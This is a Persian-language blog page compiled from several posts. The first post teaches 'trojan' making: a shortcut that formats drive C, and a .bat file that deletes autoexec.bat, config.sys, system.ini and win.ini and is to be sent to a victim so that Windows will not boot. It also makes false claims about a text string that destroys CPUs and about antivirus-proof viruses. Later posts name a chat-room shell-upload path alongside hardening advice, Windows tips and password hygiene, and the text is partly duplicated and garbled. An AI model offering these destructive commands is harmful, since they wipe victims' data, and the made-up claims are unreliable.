ساخت تروجان

سلام خدمته دوستان عزیز تیم امنیتی
ایرانخوبین !! ممنون خوبم

بعضی ها حوصله خوندن ندارن سریع
توضیهش دادم ببخشید اگه جایی از جاهاشو نفهمیدید!!!!!!! خب(

من واستون سه حالت ساخت تروجان رو
گذاشتم هر فایلی که میسازین خودتون نباید بازش کنین وگرنه خودتون صاف میشین منم
هیچ مسئولیتی ندارم ها گفته باشم

) این ویروس چیز سختی نیست ولی خیلی
خطرناکه.

اول از همه روی دسکتاپ رایت کلیک کنید
بعدش New ShortCut بسازید.

یه صفحه باز میشه در اون بنویسید: Format
C:/Autotest

سپس Next را زده و در صفحه جدید که باز میشه یه اسم واسه ویروستون
انتخاب کنید.

سپس Next را زده و یه آیکون با سلیقه خودتون برای اون انتخاب کرده و Finish کنید.

خب دیگه کارمون تمومه حالا اگه اجراش
کنین بیچاره میشین.

اگه خواستین بفهمین چی میشه به جای Format
C:/autotest بنویسید

Format a:/autotest و
یه فلاپی که حاوی اطلاعات هستش در Flopy Drive خود . . .

توضیحات در ادامه مطلبسلام دوستان . کم لطفی نکنید با این
مطالب خفن ما رو همراهی کنید . امشب اومدم آموزش ساختن چند ویروس بدون نرم افزار
رو بهتون یاد بدم . امیدوارم استفاده کافی رو ببرید۱)

این ویروس چیز سختی نیست ولی خیلی
خطرناکه.

اول از همه روی دسکتاپ رایت کلیک کنید
بعدش New ShortCut بسازید.

یه صفحه باز میشه در اون بنویسید: Format
C:/Autotest

سپس Next را زده و در صفحه جدید که باز میشه یه اسم واسه ویروستون
انتخاب کنید.

سپس Next را زده و یه آیکون با سلیقه خودتون برای اون انتخاب کرده و Finish کنید.

خب دیگه کارمون تمومه حالا اگه اجراش
کنین بیچاره میشین.

اگه خواستین بفهمین چی میشه به جای Format
C:/autotest بنویسید

Format a:/autotest و
یه فلاپی که حاوی اطلاعات هستش در Flopy Drive خودقرار دهید بعد اجراش کنید بعد برین
سراغ فلاپیتون ببینید چی شده.میبینید فلاپیپاک شده ودیگه نه میشه اطلاعات روش
ریخت ونه میشه فرمتش کرد.

۲)

روی دسک تاپ راست کلیک کنید وازگزینه
ی new --->
text document را انتخاب
کنید.

:

:c

del autoexec.bat

del config.sys

cd winnt

del system.ini

del win.ini

بعد فایل رو با پسوند bat. سیو کنید.

مثل این : nofooz.bat

این فایل رو وقتی برای کسی بفرستید
هیچی نمیشه ولی وقتی اجراش کنه و کامپیوترش رو ریست کنه دیگه ویندوزش بالا نمیاد .

۳) . روی
دسک تاپ راست کلیک کنید وازگزینه ی new ---> text document را انتخاب کنید.

2. حالا وارد text document شوید ودر آن عبارت زیررا تایپ کنید.

cpu_567hjkblaster

3. بعد از سیو کردن آنرا rename کرده و اسمی برایش انتخاب کنید.

حالا اگه فایل رو اجرا کنید باید
فاتحه ی cpu رو
بخونین.

۴)

این ویروس قابلیتی که داره اینه که
هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشهبرای ساختن این ویروس مراحل زیر رو
انجام بدید :

به Notepad رفته و این عبارت رو بنویسید :

del autotexec.bat

del config.sys

cd winnt

del system.ini

del win.ini

بعد اونو با فرمت bat سیو کنین و برای قربانی بفرستین .

admin-sina

با مطالعه ی این آموزش جلوگیری کنید از هک مدیریت چت روم
خود

در این اموزش به بالا بردن امنیت چت روم ای تی چت
میپردازیم تا جلو این ادمای الاف وبیکار که ۲۴ ساعت که کاری جز مردم ازاری ندارن
گرفته بشه

آموزش های این سایت رو در هیچ سایتی پیدا نخواهید کرد
چون کاملا اختصاصی توسط گروه ای تی چت ( همین سایت) نوشته میشن

ابتدا در مورد این افراد عرض کنم خدمت دوستان : این
افراد که با یاد گرفتن یک تغییر ای پی ساده خوددشون رو تو جو گم میکنن و هکر میگن
وای به روزی که چیزی بارشون باشه : دی

حالا میریم سر بحث هک مدیریت :

خب ای تی چت یه سری مشکلاتی داره اما بدترین مشکل ان
پسورد نداشتن پنل مدیریت میباشد و فایل های که در مسیر اصلی قرار دارن

برای مثال وقتی با اکانت مدیریت وارد چت روم بشیم پسوردی
برای ورود به پنل نیمخوادو با استفاده از کوکی و درجه ی که لاگین کردیم محاسبه
میکنه و لینک پنل میده

اما خب چرا این لینک رو به ما میده؟ چون : در فایل
جی اس مربوط به داخل چت روم یک خط مربوط به منو مدیریت هست به این شکل :‌

// Adminbereich

if (self.userPrivilegienGlobal==”gast”){

$(“form_right”).innerHTML+=”

“;

$(“link_admin”).onclick = function(){

var hoehe = $(‘chatinhalt’).getHeight();

var breite = $(‘chatinhalt’).getWidth();

var win_admin = new Window({url:
“./?AdminIndex”, className: self.win_style, width:breite, height:hoehe, top:20,
left:10, resizable: true, showEffect:Effect.Appear, hideEffect: Effect.Fade,
showEffectOptions: {duration:0.5}, hideEffectOptions: {duration:0.5},
draggable: true, minimizable: true, maximizable: true, destroyOnClose: true });

//win_prop.maximize();

win_admin.show();

}

}

خب این یعنی وقتی اگه کسی که لاگین کرد و درجه ی مدیریت
داشت پنل مدیریت لینکش داخل چت روم اضافه بشه که بنده توی لوکال بلاخره بعد تست
های بسیار زیاد تونستم دور بزنم این قسمت را !!(تا حالا کسی این کارو نتونسته)

مورد بعدی اینکه طرف اگه کمی وارد باشه میتونه با
استفاده از مهندسی اجتماعی پسورد ادمین رو بزنه ویا اگه بتونه کوکی های ادمین رو
بزنه بازم کارای زیادی میشه باهاش کرد

مورد بعدی هم در مورد اسنیف کردن ادمین ها و ناظر هاست
(که توضیحات زیاد میشه اینجا نمیشه بگیم)

خب جدیدا یک اکسپلویتی که بیرون اومده و میشه باهاش شل
اپلود کرد در این مسیر

www.domain.com/styles/admin_tpl/createNewSmilies.tpl

و از این مسیر شل اپلود میکنن که بهش میگن باگ rfu

البته من تست نکردم شاید باگ xss
هم داشته
باشن

خب برای مقابله با این روش شما باید سطرح دسترسی پوشه
شکلک را از حالت ۷۷۷ در بیارید و بزارید روی ۷۵۵ و داخل تمامی فایل ها و htaccess
را نیز

روی ۶۴۴ بگذارید

حالا برای اینکه این مسیر رو ببندیم میاییم رو پوشه
admin_tpl پسورد
میزاریم )protect password)

بعد از انجام این کار بازم کارای دیگه ای هم میتوانید
بکنید

داخل admin_tpl فایل index را باز کرده واز داخل ان میتوانید
محدودیت های زیادی اعمال کنید بطوری که وقتی که حتی با اکانت مدیریت وارد چت روم
شد از اومدنش پشیمون بشه (یعنی هیچ تغیراتی نتونه بده) اما حذف کردن قسمت اپلود
شکلک و قسمت تنظیمات عمومی چت تا حد ۹۹% جلوی اپلود شل را میگیره

نکته مهم: ما اینجا تا جایی که میشه آموزش های مفید و
کاربردی مینویسم و تا حد ممکن از آموزش خرابکاری و هک چت روم پرهیز میکنیم و
خوشحالم شما دوستان این سایت رو به بقیه دوستانی که روم هاشون مشکل دارن
معرفی کنید.

شنیدم بعد تهیه فیلم اموزشی بستن لیست در همین سایت وراه
مقابله با ان . افراد مزاحم با یادگیری این روش رفتن و چت روم های مردم را اذیت
کردند و به جای که این سایت رو به دیگران معرفی کنن خودشون راه مقابله را از اینجا
رایگان یاد میگیرن و میرن روم مردم اذیت میکنن و ازشون پول میگیرن راهشو ببندن

پس دوستان لطفا در خواست اموزش هک ندید دیگه چون از فیلم
قبلی ما سو استفاده های زیادی شد

با از این به بعد بیشتر روی بالا بردن امنیت چت روم
آموزش خواهیم نوشت

admin-sina

اگر شما از ويندوز xp استفاده
ميكنيد ميتوانيد از فايروال(ديوار اتش يا انتي هك)خود ويندوز xp استفاده كنيد.به كنترل پنل رفته و وارد Networking Connection شويد.در انجا روي ايكون dial up كه
ساخته ايد راست كليك نيد و properties را انتخاب كنيد سپس تب Advanced
را انتخاب كنيد و تيك مخصوص فعال كردن فايروال را فعال كنيد.

تجربه نشان داده كه ويندوزهاي 98 ,me به راحتي هك ميشوند.بهتر است از ويندوز 2000
و xp
استفاده كنيد.و حتما براي ويندوز 2000 هر سه سرويس پك موجود را نصب كنيد.همچنين
براي ويندوز XP هم
سرويس پك 1 عرضه شده كه ان را ميتوانيد از بازار به راحتي تهيه كنيد ويندوز XP به همراه سرويس پك 1 امن ترين سيستم عامل
ميباشد.

همچنين ميتوانيد از فرمت امن NTFS روي اين ويندوزها استفاده كنيد
كه خود عاملي جهت جلوگيری از دستيابي ديگران به داده هاي شماست.

ياهو
مسنجر خود داراي يك فايروال ميباشد.ميتوانيد از منوي Login گزينه Privacy
Setting را
انتخاب كنيد و در داخل تنظيمات Connection فايروال را انتخاب كنيد.

اگر
در ياهو ايميل داريد و چنانچه فايلي براي شما فرستاده شد ميتوانيد از طريق خود Norton
Anti Virus سايت
ياهو چك كنيد.چنانچه در چت كسي به شما پيشنهاد دادن عكس يا فايل داد بدون رودرواسي
درخواست كنيد به ادرس ايميل شما بفرستد.

از
ورود به سايتهاي شخصي كه به شما پيشنهاد ميشود خودداري كنيد مخصوصا اگر ادرس به
صورت چند عدد كه مثل يك ادرس IP ميباشد.

admin-sina

-ساخت فايل بدون نام:ابتدا روي
فايل کليک کرده و دکمه f2 را فشار دهيد سپس کليد alt را پايين نگه داشته و تايپ
کنيد 255 يا 0160 آنگاه کليد alt را رها کنيد.

2-حذف و اضافه کردن
عبارتي به منوي send to:در ويندوز 98 يا me به آدرس فايلي که ويندوز را
در آن نصب کرده ايد برويد و وارد دايرکتوري send to شويد.در ويندوز xp

send to:در ويندوز 98 يا me به آدرس فايلي که ويندوز را
در آن نصب کرده ايد برويد و وارد دايرکتوري send to شويد.در ويندوز xpوارد documents and settings سپس وارد پوشه اي به نام
کاربري خودتان شده و وارد send to شويد.حال در پنجره باز شده هر برنامه اي که
ميخواهيد برايش يک ميانبر

بسازيد يا هرچه ميخواهيد حذف کنيد.

3-فايلهاي compressed(zipped):اين نوع فايلها اين امکان را
به شما ميدهد که بتوانيد فايلهاي خود را تا حدودي کم حجم کنيد.براي اين منظور با
کليک کردن بر روي فايل يا شاخه

مورد نظر گزينه compressed(zipped)folder را از منوي send to
انتخاب کرده و آن را با پسوند zip فشرده کنيد.حال اگر بخواهيد بر روي فايلهايتان
پسورد بگذاريد فايل يا پوشه مورد نظررا به يک فايل

compressed(zipped)folder را از منوي send to
انتخاب کرده و آن را با پسوند zip فشرده کنيد.حال اگر بخواهيد بر روي فايلهايتان
پسورد بگذاريد فايل يا پوشه مورد نظررا به يک فايل zipped کپي کرده و سپس به منوي file در
بالا برويد و گزينه add a password را انتخاب کنيد و پسوردتان را بنويسيد.

4-حذف پيشوند to shortcut:در قسمت run وارد رجيستري شويد و به دنبال
فايل زير بگرديد:

to shortcut:در قسمت run وارد رجيستري شويد و به دنبال
فايل زير بگرديد:

HKEY_current_user/software/microsoft/windows/current version/explorer

سپس در سمت راست دنبال متغير link بگرديد. با دوبار کليک بر روي
آن شماره هاي آن را به چهار عدد زوج صفر تغيير دهيد.

5-غير فعال کردن پخش اتوماتيک cd در xp:my
computer را باز
کرده و بر روي cd rom خود راست کليک کنيد.سپس properties را انتخاب کرده و بر روي play auto

cd در xp:my computer را باز کرده و بر روي cd rom خود راست کليک کنيد.سپس properties
را انتخاب کرده و بر روي play autoکليک
کنيد.در drop down box ميتوانيد فعال يا غير فعال بودن اين تمايز را معلوم
کنيد.

6-نمايش دادن پسوند فايلها در xp:ابتدا وارد کنترل پنل شويد و
گزينه folder options را انتخاب کنيد سپس به منوي view رفته و عبارت hide extensions
را غير فعال کنيد.

- در مرحله اول سعی کنید وبلاگ خود را از یک سرویس دهنده مطمئن و مناسب
انتخاب نمایید.

2- در نگه داشتن ایمیل خود توجه داشته باشید.

3- این را بدانید هرگز و تحت هیچ شرایطی صاحبان سرویس دهنده
از شما پسورد وبلاگتان را نمیخواهند.

4- همیشه سعی کنید همه موارد صفحه لاگین (نوار آدرس و...) را
کاملأ چک کرده و بعد نام کاربری و رمزعبور خودتان را وارد نمایید.

5- سعی کنید از یک پسورد مناسب استفاده کنید.

6- سعی کنید همیشه در پر کردن لیست اسم نویسی برای وبلاگ
ایمیل با آی دی که در مسنجر از آن استفاده مینمایید تفاوت داشته باشد.

با استفاده و مد نظر گرفتن موارد بالا درصد هک شدن وبلاگ
خود را تا حد زیادی کاهش داده اید.

admin-sina

- در مرحله اول سعی کنید وبلاگ خود را از یک سرویس دهنده مطمئن و مناسب
انتخاب نمایید.

2- در نگه داشتن ایمیل خود توجه داشته باشید.

3- این را بدانید هرگز و تحت هیچ شرایطی صاحبان سرویس دهنده
از شما پسورد وبلاگتان را نمیخواهند.

4- همیشه سعی کنید همه موارد صفحه لاگین (نوار آدرس و...) را
کاملأ چک کرده و بعد نام کاربری و رمزعبور خودتان را وارد نمایید.

5- سعی کنید از یک پسورد مناسب استفاده کنید.

6- سعی کنید همیشه در پر کردن لیست اسم نویسی برای وبلاگ
ایمیل با آی دی که در مسنجر از آن استفاده مینمایید تفاوت داشته باشد.

با استفاده و مد نظر گرفتن موارد بالا درصد هک شدن وبلاگ
خود را تا حد زیادی کاهش داده اید.